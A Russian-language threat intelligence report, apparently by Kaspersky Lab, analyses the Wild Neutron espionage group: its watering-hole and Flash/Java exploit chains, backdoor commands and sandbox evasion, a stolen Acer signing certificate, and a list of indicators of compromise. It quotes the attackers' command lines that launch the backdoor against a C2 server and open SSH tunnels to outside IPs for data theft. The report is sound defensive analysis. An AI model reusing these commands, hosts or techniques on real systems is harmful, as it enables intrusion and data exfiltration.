Отчеты о целевых атаках (APT)

Wild Neutron: новые трюки группировки, занимающейся экономическим шпионажем

При атаках использовался сертификат подписи кода, украденный у компании Acer, и неизвестный эксплойт для Flash Player

Индикаторы заражения (IOC)

Мощная преступная группировка Wild Neutron (также известная как Jripbot или Morpho) действует, как минимум, с 2011 года. В течение многих лет она заражала крупные компании, используя комбинацию эксплойтов, атак типа watering hole и многоплатформного вредоносного ПО.

В своих последних атаках 2015 года группировка использовала украденый сертификат для подписи кода, принадлежащий тайваньскому производителю электроники – компании Acer, и ранее неизвестный эксплойт для Flash Player.

Группировка Wild Neutron привлекла всеобщее внимание в 2013 году, когда ей удалось заразить такие известные компании как Apple, Facebook, Twitter и Microsoft. В той атаке она использовала Java-эксплойт нулевого дня и стратегию watering hole для взлома форумов. Инцидент 2013 года получил большой резонанс, после чего группировка почти год не давала о себе знать.

#WildNeutron – мощная группировка, возможно занятая экономическим шпионажем

Tweet

В конце 2013 – начале 2014 гг. атаки возобновились и продолжились в 2015 году. Целями новых атак стали:

  • Юридические компании
  • Компании, работающие с криптовалютой биткойн
  • Инвестиционные компании
  • Крупные группы компаний, участвующие в сделках по слиянию
  • ИТ-компании
  • Фармацевтические компании
  • Компании, управляющие недвижимостью
  • Отдельные пользователи

Направленность атак дает основание полагать, что Wild Neutron не является группой, работающей при поддержке какого-либо государства. Однако использование эксплойтов нулевого дня, многоплатформенного вредоносного ПО и других приемов убеждает нас, что эта мощная группировка занимается шпионажем, вероятно, по экономическим причинам.

Более ранние кампании (2013 г.)

В ходе атак 2013 года группировка Wild Neutron успешно взломала и использовала сайт www.iphonedevsdk[.]com, на котором находился форум разработчиков iPhone.

Злоумышленники внедрили в форум скрипт, который перенаправлял посетителей на сайт min.liveanalytics[.]org, где находился Java-эксплойт нулевого дня (в настоящее время «Лаборатория Касперского» перенаправила этот домен на свой sinkhole-сервер). Аналогичным образом был атакован форум разработчиков Linux fedoraforum[.]org. Более подробно эти атаки 2013 г. анализирует в своем блоге Эрик Романг (Eric Romang): http://eromang.zataz.com/2013/02/20/facebook-apple-twitter-watering-hole-attack-additional-informations/.

Ниже показан список других форумов, которые также были взломаны группировкой Wild Neutron, что обнаружилось по данным Kaspersky Security Network:

  • expatforum.com
  • mygsmindia.com
  • forum.samdroid.net
  • emiratesmac.com
  • forums.kyngdvb.com
  • community.flexispy.com
  • ansar1.info

Из этих форумов стоит выделить два: community.flexispy[.]com и ansar1[.]info. Первый – форум Flexispy, компании, продающей шпионское ПО для мобильных устройств. Второй – один из джихадистских форумов, который сейчас закрыт.

Wild Neutron: новые трюки группировки, занимающейся экономическим шпионажем

Форум ansar1[.]info был взломан группировкой Wild Neutron в 2013 году

В том же 2013 году злоумышленники использовали бэкдор OSX/Pintsized для Mac OS X. Он также подробно описан в превосходном блоге Эрика Романга: http://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/. Этот же бэкдор, скомпилированный для Win32, продолжает использоваться в атаках 2015 года.

#WildNeutron – одна из самых необычных среди выявленных и изученных нами APT-группировок

Tweet

Жертвами атак 2013 года стали несколько известных компаний, включая Twitter, Facebook, Apple и Microsoft. Эти случаи взлома широко освещались в прессе, а некоторые из пострадавших компаний даже выступили с заявлениями по поводу этих инцидентов (см. Заявление Facebook).

То, что мишенями атак стали крупнейшие ИТ-компании, такие как Facebook, Twitter, Apple и Microsoft, – необычный, но не уникальный случай. Гораздо более необычным выглядит отсутствие жертв в других отраслях, например, в дипломатических или государственных учреждениях. Это заставляет предположить, что атаки не поддерживаются на государственном уровне.

Технический анализ

Комплект вредоносного ПО, используемый преступной группировкой Wild Neutron, включает в себя несколько групп компонентов:

  • Бэкдор – главный модуль, устанавливающий связь с командным сервером
  • Несколько модулей сбора информации
  • Инструменты эксплуатации уязвимостей
  • Инструменты кражи данных, работающие на базе протокола SSH
  • Промежуточные загрузчики и установщики, расшифровывающие и выполняющие полезную нагрузку.

Похоже, что за основу некоторых модулей были взяты инструменты с открытым кодом и коммерческие вредоносные программы, которые были модифицированы под конкретные требования (так, код дампера паролей напоминает Mimikatz и Pass-The-Hash Toolkit, а модуль HTTPS-прокси практически идентичен модулю в Hesperbot).

Похоже, что за основу некоторых модулей были взяты инструменты с открытым кодом #WildNeutron

Tweet

Весь обмен данными с командным сервером шифровался с использованием нестандартного протокола. Помещенные установщиком исполняемые файлы и некоторые жестко закодированные строки обычно обфусцировались операцией XOR (в зависимости от версии бота). В главном модуле (бэкдоре) используется несколько методов обхода защиты, которые позволяют обнаружить и прекратить работу «песочниц» и средств эмуляции по тайм-ауту.

Эксплуатация уязвимостей в 2015 году

Первоначальный вектор заражения атак 2014-2015 гг. до сих пор неизвестен, хотя есть явные признаки того, что для заражения жертв использовался пакет с неизвестным эксплойтом для Flash Player.

В одной из атак наблюдалась следующая цепочка эксплойтов:

Сайт hxxp://cryptomag.mediasource.ch/
Пути /favicon.ico
/msie9html5.jpg
/loader-large.gif
/bootstrap.min.css
/stats.js?d=1434374526478
/autoload.js?styleid=20&langid=5&sid=883f2efa&d=1434374526
/banner.html?styleid=19&langid=23&sid=883f2efa&d=1434374526
/883f2efa/bniqligx.swf?styleid=4&langid=6&sid=883f2efa&d=1434374533
/883f2efa/pzixfgne?styleid=5&langid=25&sid=883f2efa&d=1434374533
/883f2efa/bniqligx.swf?styleid=4&langid=6&sid=883f2efa&d=1434374533/
/background.jpg

По-видимому, для этой атаки был создан субдомен cryptomag.mediasource[.]ch; он указывал на IP-адрес, связанный с другими командными серверами Wild Neutron. Ниже они подчеркнуты красным цветом:

Wild Neutron: новые трюки группировки, занимающейся экономическим шпионажем

Хосты, имена которых преобразуются в IP-адрес 66.55.133[.]89

Учитывая, что app.cloudprotect[.]eu и ssl.cloudprotect[.]eu – известные командные серверы Wild Neutron, субдомен cryptomag.mediasource[.]ch видимо указывал на данный IP-адрес с целью эксплуатации уязвимостей. В списке есть и другой подозрительный домен – secure.pdf-info[.]com. Мы пока не наблюдали атак, связанных с этим именем хоста, но схема имен указывает на то, что он также является вредоносным.

В другой атаке мы наблюдали подобную цепочку эксплойтов на другом сайте – hxxp://find.a-job.today/.

В обоих случаях посетители просматривали сайт или попадали на него через интернет-рекламу. В обоих случаях скрипт autoload.js перенаправлял их с данного сайта на другой HTML-файл с произвольным именем, который в итоге загружал SWF-файл с произвольным именем.

В 2013 году группировка использовала атаки типа watering hole, однако пока неясно, каким образом она перенаправляет своих жертв на наборы эксплойтов в новых атаках 2014-2015 гг. В более ранних атаках конца 2012 – начала 2013 гг. для эксплуатации уязвимостей и применения стратегии watering hole группировка Wild Neutron вместо эксплойтов для Flash Player использовала Java-эксплойт нулевого дня, который детектируется продуктами «Лаборатории Касперского» как Exploit.Java.CVE-2012-3213.b.

Главный установщик вредоносного ПО

Функции главного установщика достаточно просты: он расшифровывает исполняемый файл бэкдора (файл хранится как ресурс и зашифрован простой операцией XOR 0x66), записывает его в указанное место и затем вызывает с параметрами, жестко зашитыми в теле установщика. Один из параметров представляет собой URL-адрес командного сервера, а остальные содержат различные параметры конфигурации бота.

Пример параметров, используемых установщиком:

igfxupt.exe https://app.cloudprotect[.]eu:443 /opts resolv=logs.cloudprotect[.]eu

После выполнения главного бэкдора установщик надежно удаляет себя: он несколько раз записывает поверх своего содержимого случайные числа, а затем переименовывает и удаляет файл.

Главный бэкдор (или Jripbot)

При вызове этот двоичный файл получает в качестве параметра URL-адрес командного сервера; кроме того, ему может быть переданы необязательные параметры конфигурации бота. Затем эти данные дважды шифруются (сначала с помощью алгоритма RC4, затем функцией CryptProtectData системы Windows) и сохраняются в реестре.

Прежде чем выполнить любое действие, вредоносная программа запускает замедляющий код (stalling code), который должен опередить эмуляторы. После этого она производит несколько проверок, чтобы убедиться, что не работает в «песочнице», и при обнаружении в системе любого нежелательного ПО входит в бесконечный цикл.

Убедившись, что опасности нет, вредоносная программа начинает собирать основные сведения о системе:

  • Версию операционной системы
  • Работает ли программа под управлением WOW64
  • Имеет ли пользователь права администратора
  • Какие функции безопасности Windows включены
  • Имя пользователя и имя компьютера
  • Имя сервера и группу LAN
  • Информацию о логических дисках
  • Время работы и время простоя системы
  • Браузер, используемый по умолчанию
  • Параметры прокси-сервера.

На основе этих данных вредоносная программа генерирует уникальный идентификатор жертвы и начинает обмен данными с командным сервером: передает ему идентификатор и ждет команды.

Параметры конфигурации бэкдора могут включать адрес прокси-сервера и учетные данные, значения sleeptime/задержки и тип соединения. Но самый интересный параметр – resolv=[url]. Если этот параметр задан, вредоносная программа генерирует имя домена, состоящее из имени компьютера, уникального идентификатора и URL-адреса, переданного в качестве параметра. Затем она пытается определить IP-адрес этого домена. Мы предполагаем, что этот метод злоумышленники используют для передачи сгенерированного уникального идентификатора командному серверу.

Командный сервер может передавать боту команды на выполнение следующих действий:

  • Изменение текущего каталога на заданный
  • Выполнение произвольной команды из командной строки
  • Установка собственного автозапуска в реестре
  • Удаление собственного автозапуска из реестра
  • Безвозвратное удаление заданного файла (поверх содержимого файла записываются случайные числа, имя файла заменяется нулями, затем файл удаляется)
  • Скачивание файла из интернета и сохранение на диске (с опцией шифрования)
  • Установка и удаление дополнительных вредоносных плагинов
  • Сбор и передача сведений о системе
  • Составление списка дисков
  • Установка значения sleeptime
  • Обновление конфигурации
  • Обновление своего кода
  • Прекращение работы.

Более ранние версии этого бэкдора, использовавшиеся в атаках 2013 года, имели несколько дополнительных функций:

  • Сбор паролей
  • Сканирование портов
  • Сбор снимков экрана
  • Передача файлов командному серверу
  • Reverse shell

Эти функции были удалены из версий бэкдора, использовавшихся при последних атаках. Вместо них разработчики вредоносного ПО решили реализовать механизм плагинов и вызывать для решения различных задач соответствующие инструменты. То есть наблюдается явное движение в сторону более гибкой модульной архитектуры.

С точки зрения функциональных возможностей главный бэкдор не отличается от множества других средств удаленного доступа (RAT – Remote Access Tools). Что его действительно отличает, так это стремление злоумышленников скрыть адрес командного сервера, зашифровав его в реестре с использованием машинно-зависимой информации. Примечательна также способность к восстановлению после выключения командного сервера путем обращения к динамически генерируемому имени домена, которое заранее известно только злоумышленникам и напрямую связано с конкретной жертвой.

Согласно датам образцов, распространение вредоносного ПО выглядит следующим образом:

Wild Neutron: новые трюки группировки, занимающейся экономическим шпионажем

Очевидно, каждый бэкдор имеет внутренний номер версии. У последних образцов он находится в диапазоне от 11000 до 16000. Это позволило нам построить следующую схему эволюции:

Бэкдоры, использовавшиеся в атаках 2013 г.:

MD5 Дата Версия Имя файла Размер
1582d68144de2808b518934f0a02bfd6 29 ноября 2012 11000 javacpl.exe 327168
14ba21a3a0081ef60e676fd4945a8bdc 30 ноября 2012 12000 javacpl.exe 329728
0fa3657af06a8cc8ef14c445acd92c0f 09 января 2013 13000 javacpl.exe 343552

Бэкдоры, использовавшиеся в атаках 2014 и 2015 гг.:

MD5 Дата Версия Имя файла Размер
95ffe4ab4b158602917dd2a999a8caf8 13 декабря 2013 14014 LiveUpdater.exe 302592
342887a7ec6b9f709adcb81fef0d30a3 20 июня 2014 15013 FlashUtil.exe 302592
dee8297785b70f490cc00c0763e31b69 02 августа 2013
(возможно, дата фальшивая)
16010 IgfxUpt.exe 291328
f0fff29391e7c2e7b13eb4a806276a84 27 октября 2014 16017 RtlUpd.exe 253952

Инсталляторы также имеют номер версии, который указывает на следующую эволюцию:

MD5 Дата Версия
1f5f5db7b15fe672e8db091d9a291df0 16 декабря 2011 1.4.1
48319e9166cda8f605f9dce36f115bc8 28 сентября 2012 1.5.0
088472f712d1491783bbad87bcc17c48 12 апреля 2013 1.6.3
ee24a7ad8d137e54b854095188de0bbf 07 января 2014 1.6.4

Дальнейшее распространение

После установки главного бэкдора и первоначального подключения к командному серверу злоумышленники используют различные инструменты для извлечения конфиденциальных данных с компьютера жертвы. Среди них троянец для сбора паролей, бэкдор обратной связи, а также реализации OpenSSH, WMIC и SMB, модифицированные для целей злоумышленников. Иногда они просто устанавливают простой reverse shellна perl и используют различные методы сбора информации для извлечения учетных данных из нескольких компьютеров, повышения привилегий и распространения вредоносного ПО по всей сети. Наряду с этими инструментами они используют ряд небольших вспомогательных модулей, выполняющих различные функции – от загрузчиков и средств конфигурирования до шредеров файлов и сетевых прокси-серверов.

Также следует отметить, что для построения собственного инструментария эта преступная группировка широко применяет существующий код, используя готовые приложения с открытым кодом, а также инструменты Metasploit и добытые в результате утечек вредоносные программы. Некоторые из этих инструментов предназначены для работы в среде Cygwin и распространяются вместе с Cygwin API DLL. Это позволяет предположить, что злоумышленники чувствуют себя более комфортно в Linux-подобных средах.

Бэкдор, использующий SSH-туннелирование

В атаках 2014-2015 гг. злоумышленники развертывали на платформе Win32 специальные бэкдоры, использующие туннелирование на базе OpenSSH, для надежного скачивания больших объемов данных. Эти бэкдоры хранятся под именем «updt.dat» и вызываются с двумя параметрами, «-z» и «-p». Используется порт 443, но при этом создается SSH-соединение:

  • /d /u /c updt.dat -z 185.10.58.181 -p 443
  • /d /u /c updt.dat -z 46.183.217.132 -p 443
  • /d /u /c updt.dat -z 217.23.6.13 -p 443

Для аутентификации бэкдор с SSH-туннелированием использует жестко закодированный закрытый RSA-ключ.

Краденый сертификат

В атаках 2015 года группировка Wild Neutron использовала установщик, подписанный украденым, но действительным сертификатом компании Acer Incorporated.

Wild Neutron: новые трюки группировки, занимающейся экономическим шпионажем

Подпись компании Acer в установщике Wild Neutron

Этот злонамеренно использованный сертификат имеет следующие свойства:

Серийный номер: 5c c5 3b a3 e8 31 a7 df dc 7c 28 d5 15 8f c3 80
Отпечаток: 0d 85 91 41 ee 9a 0c 6e 72 5f fe 6b cf c9 9f 3e fc c3 fc 07

Можно видеть, что установщик (dbb0ea0436f70f2a178a60c4d8b791b3) был подписан 15 июня 2015 г. Он устанавливает бэкдор Jripbot (файл IgfxUpt.exe) и настраивает его на использование командного сервера app.cloudprotect[.]eu.

Группировка #WildNeutron использовала установщик с украденым действительным сертификатом компании Acer Incorporated

Tweet

Мы работали с компаниями Symantec, Verisign и Acer, чтобы отозвать взломанный сертификат.

Жертвы и статистика

Атаки группировки Wild Neutron кажутся очень целенаправленными. В ходе расследования нам удалось выявить несколько жертв из 11 стран и территорий:

  • Франция
  • Россия
  • Швейцария
  • Германия
  • Австрия
  • Палестина
  • Словения
  • Казахстан
  • ОАЭ
  • Алжир
  • США

В 2014-2015 гг. жертвами атак становились в основном риелторские/инвестиционные и ИТ-компании, причем число зараженных компьютеров во всех случаях было небольшим. По-видимому, злоумышленники обновляли вредоносный имплант и развертывали некоторые дополнительные инструменты, но дальнейшего значительного распространения не наблюдалось.

Установление авторства

Атаки на различные компании без нацеленности на государственные учреждения позволяют предположить, что эта APT-группировка не поддерживается на государственном уровне. Злоумышленники также проявляли интерес к жертвам, имеющим отношение к инвестициям, что указывает на наличие знаний и навыков использования такой информации на рынке с целью извлечения финансовых выгод.

Зашифрованные конфигурации некоторых образцов содержали строку на румынском языке #WildNeutron

Tweet

Зашифрованные конфигурации некоторых образцов содержали строку на румынском языке, с помощью которой отмечался конец связи с командным сервером:

Wild Neutron: новые трюки группировки, занимающейся экономическим шпионажем

Интересно, что «La revedere» означает на румынском «до свидания». Кроме того, мы нашли еще одну не-англоязычную строку: русское слово «успешно» в латинской транскрипции («uspeshno»). Эта строка записывается в канал после выполнения команды командного сервера.

#WildNeutron Мы обнаружили еще одну неанглоязычную строку: русское слово в латинской транскрипции

Tweet

Один из образцов имел внутреннее имя WinRAT-Win32-Release.exe. Видимо, авторы называют свое вредоносное ПО WinRAT.

Пользователи Kaspersky Intelligence Services могут получить более подробную информацию об атрибуции Wild Neutron. Обращайтесь по адресу: intelreports@kaspersky.com

Выводы

Wild Neutron является одной из самых необычных среди выявленных и изученных нами APT-группировок. Эта группировка действует с 2011 года. Она использует, по меньшей мере, один эксплойт нулевого дня, специализированные вредоносные программы и инструменты. Ей удается обеспечить достаточно надежную оперативную защиту и до настоящего времени уклоняться от большинства попыток атрибуции. Нацеленность группировки на крупные ИТ-компании, разработчиков шпионского ПО (FlexiSPY), форумы джихадистов (форум Ansar Al-Mujahideen English Forum) и компании, работающие с криптовалютой, указывает на гибкий и необычный образ мышления и круг интересов.

Несколько отличительных особенностей группировки:

  • Использование инструментов с открытым кодом и утечек исходных кодов различного вредоносного ПО
  • Использование для подписи вредоносного ПО украденого сертификата компании Acer Incorporated
  • Использование для начального проникновения кроссплатформенного эксплойта нулевого дня (Java и Flash) и затем кроссплатформенной полезной нагрузки reverse shell (Perl)
  • Использование *NIX-кода с переносом на платформу Windows с помощью Cygwin
  • Активное использование протокола SSH для скачивания данных, использование широко применяемых *NIX средств администрирования
  • Использование CryptProtectData API для сохранения в тайне URL-адресов командных серверов
  • Простой интерфейс командной строки для всех компонентов вредоносного ПО с использованием именованных каналов для передачи данных между модулями
  • Вспомогательные инструменты написаны на языке С. Большинство из них имеет встроенную справку, которую можно распечатать, вызвав соответствующий двоичный файл с параметром «–pleh»

Мы продолжаем следить за группировкой Wild Neutron, которая активна до сих пор (по состоянию на июнь 2015 г.).

Продукты «Лаборатории Касперского» детектируют вредоносное ПО, используемое при атаках, как:
HEUR:Trojan.Win32.WildNeutron.gen, Trojan.Win32.WildNeutron.*, Trojan.Win32.JripBot.*, HEUR:Trojan.Win32.Generic

Более подробная информация о продуктах «Лаборатории Касперского» поможет вам защититься то преступной группировки Wild Neutron:
Wild Neutron in the wild: perhaps you’re his next prey

Индикаторы заражения (IOCs)

Известные имена вредоносных хостов и доменов:

ddosprotected.eu
updatesoft.eu
app.cloudprotect.eu
fw.ddosprotected.eu
logs.cloudprotect.eu
ssl.cloudprotect.eu
ssl.updatesoft.eu
adb.strangled.net
digitalinsight-ltd.com
ads.digitalinsight-ltd.com
cache.cloudbox-storage.com
cloudbox-storage.com
clust12-akmai.net
corp-aapl.com
fb.clust12-akmai.net
fbcbn.net
img.digitalinsight-ltd.com
jdk-update.com
liveanalytics.org
min.liveanalytics.org
pop.digitalinsight-ltd.com
ww1.jdk-update.com
find.a-job.today
cryptomag.mediasource.ch

Известные вредоносные IP-адреса:

185.10.58.181
46.183.217.132
64.187.225.231
62.113.238.104
66.55.133.89
217.23.6.13

Известные имена файлов:

%APPDATA%RoamingFlashUtil.exe
%APPDATA%RoamingAcerLiveUpdater.exe
%APPDATA%RoamingRealtekRtlUpd.exe
%ProgramData%RealtekRtlUpd.exe
%APPDATA%Roamingsqlite3.dll (UPX packed)
%WINDIR%winsession.dll
%APPDATA%appdatalocaltempteamviewerversion9update.exe
%SYSTEMROOT%temp_dbg.tmp
%SYSTEMROOT%tempok.tmp
C:windowstempdebug.txt
C:windowssyswow64mshtaex.exe
%SYSROOT%System32mshtaex.exe
%SYSROOT%System32wdigestEx.dll
%SYSROOT%System32dpcore16t.dll
%SYSROOT%System32iastor32.exe
%SYSROOT%System32mspool.dll
%SYSROOT%System32msvcse.exe
%SYSROOT%System32mspool.exe
C:Program Files (x86)LNVSuiteLnrAuth.dll
C:Program Files (x86)LNVSuiteLnrAuthSvc.dll
C:Program Files (x86)LNVSuiteLnrUpdt.exe
C:Program Files (x86)LNVSuiteLnrUpdtP.exe
DF39527~.tmp

Именованные каналы:

\.pipewinsession
\.pipelsassw

События и мьютексы:

GlobalLnrRTPDispatchEvents
_Winlogon_TCP_Service

Wild Neutron: новые трюки группировки, занимающейся экономическим шпионажем

Ваш e-mail не будет опубликован. Обязательные поля помечены *

 

Отчеты

StripedFly: двуликий и незаметный

Разбираем фреймворк StripedFly для целевых атак, использовавший собственную версию эксплойта EternalBlue и успешно прикрывавшийся майнером.

Азиатские APT-группировки: тактики, техники и процедуры

Делимся с сообществом подходами, которые используют азиатские APT-группировки при взломе инфраструктуры, и подробной информацией о тактиках, техниках и процедурах (TTPs) злоумышленников, основанной на методологии MITRE ATT&CK.

Как поймать «Триангуляцию»

Эксперты «Лаборатории Касперского» смогли получить все этапы «Операции Триангуляция»: эксплойты нулевого дня для iOS, валидаторы, имплант TriangleDB и дополнительные модули.

Подпишитесь на еженедельную рассылку

Самая актуальная аналитика – в вашем почтовом ящике